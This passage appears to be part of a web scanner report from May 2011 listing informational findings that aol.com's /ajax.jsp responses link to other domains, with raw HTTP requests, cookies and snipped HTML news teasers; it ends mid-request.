Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2421
Set-Cookie: JSESSIONID=BF713CDFEEC54B891A28081E9C94F8AE; Path=/aol
Content-Length: 2421

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl1 plid-60572 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1|60572" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html"><img height="217" alt="Osama bin Laden" width="386" src="http://i.huffpost.com/gen/273394/thumbs/a-OSAMA-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl1_hdln" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2|60572">Media Defends Posting Gruesome Pics

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl1_cpy" href="http://www.huffingtonpost.com/2011/05/04/bin-laden-dead-photo_n_857772.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3|60572">Warning: shots are extremely graphic
</a>
...[SNIP]...
<li ><a name="om_dl1_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl1|sec3_lnk1|60572" href="http://www.huffingtonpost.com/2011/05/04/dems-plan-oil-subsidy-vote_n_857685.html">Dems to Force Vote on Oil Subsidies
</a>
...[SNIP]...
<li ><a name="om_dl1_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl1|sec3_lnk2|60572" href="http://www.huffingtonpost.com/2011/05/04/joe-biden-debt-ceiling_n_857738.html">Joe Biden Steps Into Debt Ceiling Void </a>
...[SNIP]...
<li ><a name="om_dl1_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3|60572" href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html">Afghanistan: 'Pakistan Had to Know'</a>
...[SNIP]...

16.12. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://celebra.aollatino.com/2010/04/29/spanish-quiz/
http://celebra.aollatino.com/2010/04/29/tequila-drinks-quiz/
http://celebra.aollatino.com/2010/04/29/tequila-history-facts-quiz/
http://i.huffpost.com/gen/273921/thumbs/a-CINCO-DE-MAYO-386x217.jpg
http://noticias.aollatino.com/2010/04/15/five-of-may/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl7

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-38.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2296
Set-Cookie: JSESSIONID=245978DD9294CA6A02BA7A7074CB40E4; Path=/aol
Content-Length: 2296

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-60486 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|60486" href="http://noticias.aollatino.com/2010/04/15/five-of-may/"><img height="217" alt="Cinco de Mayo" width="386" src="http://i.huffpost.com/gen/273921/thumbs/a-CINCO-DE-MAYO-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://noticias.aollatino.com/2010/04/15/five-of-may/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|60486">Why Is Cinco De Mayo a Holiday?
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://noticias.aollatino.com/2010/04/15/five-of-may/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|60486">Surprising facts about the holiday
</a>
...[SNIP]...
<li ><a name="om_dl8_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl8|sec3_lnk1|60486" href="http://celebra.aollatino.com/2010/04/29/spanish-quiz/">Quiz: Test Your Spanish Skills
</a>
...[SNIP]...
<li ><a name="om_dl8_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl8|sec3_lnk2|60486" href="http://celebra.aollatino.com/2010/04/29/tequila-history-facts-quiz/">The Four Types of Tequila Are ...
</a>
...[SNIP]...
<li ><a name="om_dl8_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl8|sec3_lnk3|60486" href="http://celebra.aollatino.com/2010/04/29/tequila-drinks-quiz/">What's Your Personal Tequila Drink?
</a>
...[SNIP]...

16.13. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/6374677899dea4e42ce0725b8f3b188d/macaroni-and-cheese386lh050211.jpg
http://www.huffingtonpost.com/2011/05/03/taco-bell-cheesy-double-decker-taco_n_856790.html
http://www.huffingtonpost.com/2011/05/04/white-castle-online-orders_n_857416.html
http://www.huffingtonpost.com/adam-roberts/restaurant-mistakes_b_854601.html
http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=9&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; stips5=1; s_pers=%20s_getnr%3D1304575085859-Repeat%7C1367647085859%3B%20s_nrgvo%3DRepeat%7C1367647085861%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl7

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:07 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-27-32.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2637
Set-Cookie: JSESSIONID=C2C9AF6EF07E0F5552CCDBA3B421B0B8; Path=/aol
Content-Length: 2637

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl9 plid-60552 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl9_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl9|sec1_lnk1|60552" href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&title=10_Mac_n"><img height="217" alt="Mac and cheese" width="386" src="http://o.aolcdn.com/hss/storage/adam/6374677899dea4e42ce0725b8f3b188d/macaroni-and-cheese386lh050211.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl9_hdln" onclick=" " href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&title=10_Mac_n" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl9|sec1_lnk2|60552">10 Odd Ways to Use Mac & Cheese
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl9_cpy" href="http://www.huffingtonpost.com/endless-simmer/macaroni-and-cheese-ideas_b_852998.html#s268735&title=10_Mac_n" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl9|sec1_lnk3|60552">Pics that may make your mouth water
</a>
...[SNIP]...
<li ><a name="om_dl9_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl9|sec3_lnk1|60552" href="http://www.huffingtonpost.com/adam-roberts/restaurant-mistakes_b_854601.html">10 Restaurant Mistakes to Avoid
</a>
...[SNIP]...
<li ><a name="om_dl9_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl9|sec3_lnk2|60552" href="http://www.huffingtonpost.com/2011/05/03/taco-bell-cheesy-double-decker-taco_n_856790.html">Taco Bell's New Item Taste-Tested
</a>
...[SNIP]...
<li ><a name="om_dl9_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl9|sec3_lnk3|60552" href="http://www.huffingtonpost.com/2011/05/04/white-castle-online-orders_n_857416.html">New Way to Order at White Castle
</a>
...[SNIP]...

16.14. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/b9b4010e8ef8fd1b93d138ae626941ba/mom-style-icon-amanda-both-386kk0504.jpg
http://www.huffingtonpost.com/2011/05/04/kate-middleton-photoshop_n_857564.html
http://www.huffingtonpost.com/2011/05/04/sarah-burton-kate-middleton-wedding-dress_n_857308.html
http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html
http://www.stylelist.com/2011/05/04/hilary-swank-look-of-the-day/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575003664-Repeat%7C1367647003664%3B%20s_nrgvo%3DRepeat%7C1367647003665%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl2; rrpmo1=rr1~2~1304556981389~0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2590
Set-Cookie: JSESSIONID=B5F28F5E1FE07A793511CE9FC001A06B; Path=/aol
Content-Length: 2590

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-60532 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|60532" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&title=The_Tulle_Topper"><img height="217" alt="Pic of Stylish Mom" width="386" src="http://o.aolcdn.com/hss/storage/adam/b9b4010e8ef8fd1b93d138ae626941ba/mom-style-icon-amanda-both-386kk0504.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl3_hdln" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&title=The_Tulle_Topper" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl3|sec1_lnk2|60532">Proof That Moms Can Be Very Stylish

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl3_cpy" href="http://www.huffingtonpost.com/piper-weiss/my-mom-the-style-icon-pho_b_857621.html#s272161&title=The_Tulle_Topper" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl3|sec1_lnk3|60532">Images show real-life 'style icons'

</a>
...[SNIP]...
<li ><a name="om_dl3_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl3|sec3_lnk1|60532" href="http://www.huffingtonpost.com/2011/05/04/kate-middleton-photoshop_n_857564.html">Kate Middleton Gets Photoshopped</a>
...[SNIP]...
<li ><a name="om_dl3_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl3|sec3_lnk2|60532" href="http://www.huffingtonpost.com/2011/05/04/sarah-burton-kate-middleton-wedding-dress_n_857308.html">Dress Designer Breaks Her Silence
</a>
...[SNIP]...
<li ><a name="om_dl3_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl3|sec3_lnk3|60532" href="http://www.stylelist.com/2011/05/04/hilary-swank-look-of-the-day/">Hilary Swank Dons Nude Ensemble
</a>
...[SNIP]...

16.15. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/5a2571070ba3fe04b68a6fa658632a28/pharows-trap-386lvg050411.jpg
http://www.games.com/game/backgammon/
http://www.games.com/game/family-feud/
http://www.games.com/game/sarah-quest-the-pharaohs-trap/
http://www.games.com/game/star-marbles/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; rrpmo1=rr1~6~1304556981389~0; stips5=1; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575110110-Repeat%7C1367647110110%3B%20s_nrgvo%3DRepeat%7C1367647110112%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-49.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2275
Set-Cookie: JSESSIONID=C5F9615C0457F6AD2629C4B0D8985FFD; Path=/aol
Content-Length: 2275

<span class="dn" id="#curr-dlcount">13</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-60483 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl11_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl11|sec1_lnk1|60483" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/"><img height="217" alt="Pharaohs Trap" width="386" src="http://o.aolcdn.com/hss/storage/adam/5a2571070ba3fe04b68a6fa658632a28/pharows-trap-386lvg050411.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl11_hdln" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl11|sec1_lnk2|60483">This Level Took Us 2 Mins. to Beat
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl11_cpy" href="http://www.games.com/game/sarah-quest-the-pharaohs-trap/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl11|sec1_lnk3|60483">Hurry up before time runs out
</a>
...[SNIP]...
<li ><a name="om_dl11_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl11|sec3_lnk1|60483" href="http://www.games.com/game/family-feud/">Think You Can Beat 'Family Feud'?
</a>
...[SNIP]...
<li ><a name="om_dl11_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl11|sec3_lnk2|60483" href="http://www.games.com/game/star-marbles/">Try to Beat the Clock in Star Marbles
</a>
...[SNIP]...
<li ><a name="om_dl11_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl11|sec3_lnk3|60483" href="http://www.games.com/game/backgammon/">Take On Your Friends in Backgammon
</a>
...[SNIP]...

16.16. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following links to other domains:

http://o.aolcdn.com/hss/storage/adam/962ab85e9f469332d79a7364f9c4d87e/judges-386a-05052011.jpg
http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/
http://www.tvsquad.com/2011/05/05/bad-experience-at-male-strip-club-ellie-kemper-kimmel-video/
http://www.tvsquad.com/2011/05/05/betty-white-upsets-letterman-photo-of-leno-in-book-video/
http://www.tvsquad.com/2011/05/05/kate-hudson-teaches-leno-trick-determine-gender-baby-video/

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614702632-Repeat%7C1367686702632%3B%20s_nrgvo%3DRepeat%7C1367686702634%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:59:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-25-36.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 2522
Set-Cookie: JSESSIONID=41AEA304D028DFC4041FD9E9918D8780; Path=/aol
Content-Length: 2522

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-60585 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl3_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl3|sec1_lnk1|60585" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/"><img height="217" width="386" src="http://o.aolcdn.com/hss/storage/adam/962ab85e9f469332d79a7364f9c4d87e/judges-386a-05052011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl3_hdln" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl3|sec1_lnk2|60585">Very Emotional Performance on 'Idol'</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl3_cpy" href="http://www.tvsquad.com/2011/05/04/james-durbin-emotionally-perfect-without-you-idol-video/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl3|sec1_lnk3|60585">Reason he almost started crying</a>
...[SNIP]...
<li ><a name="om_dl3_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl3|sec3_lnk1|60585" href="http://www.tvsquad.com/2011/05/05/bad-experience-at-male-strip-club-ellie-kemper-kimmel-video/">Actress' Bad Strip Club Experience</a>
...[SNIP]...
<li ><a name="om_dl3_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl3|sec3_lnk2|60585" href="http://www.tvsquad.com/2011/05/05/betty-white-upsets-letterman-photo-of-leno-in-book-video/">Betty White Photo 'Upsets' Letterman</a>
...[SNIP]...
<li ><a name="om_dl3_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl3|sec3_lnk3|60585" href="http://www.tvsquad.com/2011/05/05/kate-hudson-teaches-leno-trick-determine-gender-baby-video/">Kate Hudson Dishes About Pregnancy</a>
...[SNIP]...

16.17. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following link to another domain:

http://o.aolcdn.com/hss/storage/adam/c4f11f0825573fccecd92b3ec3faca91/vegas-hotels-386lvg050411.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=11&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; s_pers=%20s_getnr%3D1304614868360-Repeat%7C1367686868360%3B%20s_nrgvo%3DRepeat%7C1367686868361%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; rrpmo1=NaN; stips5=1; dlact=dl10

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:03:25 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-46.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 3580
Set-Cookie: JSESSIONID=C2EF40E52E599258E45893C5902F838E; Path=/aol
Content-Length: 3580

<span class="dn" id="#curr-dlcount">11</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-60526 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</b><img height="217" alt="MGM Grand Hotel on the Las Vegas Strip" width="386" src="http://o.aolcdn.com/hss/storage/adam/c4f11f0825573fccecd92b3ec3faca91/vegas-hotels-386lvg050411.jpg"/></a>
...[SNIP]...

16.18. http://www.aol.com/ajax.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.aol.com/ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config

The response contains the following link to another domain:

http://o.aolcdn.com/hss/storage/adam/bf24920b004e4f94f1bc4d54ca23eaa5/my-next-move-386lvg050411.jpg

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=4&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
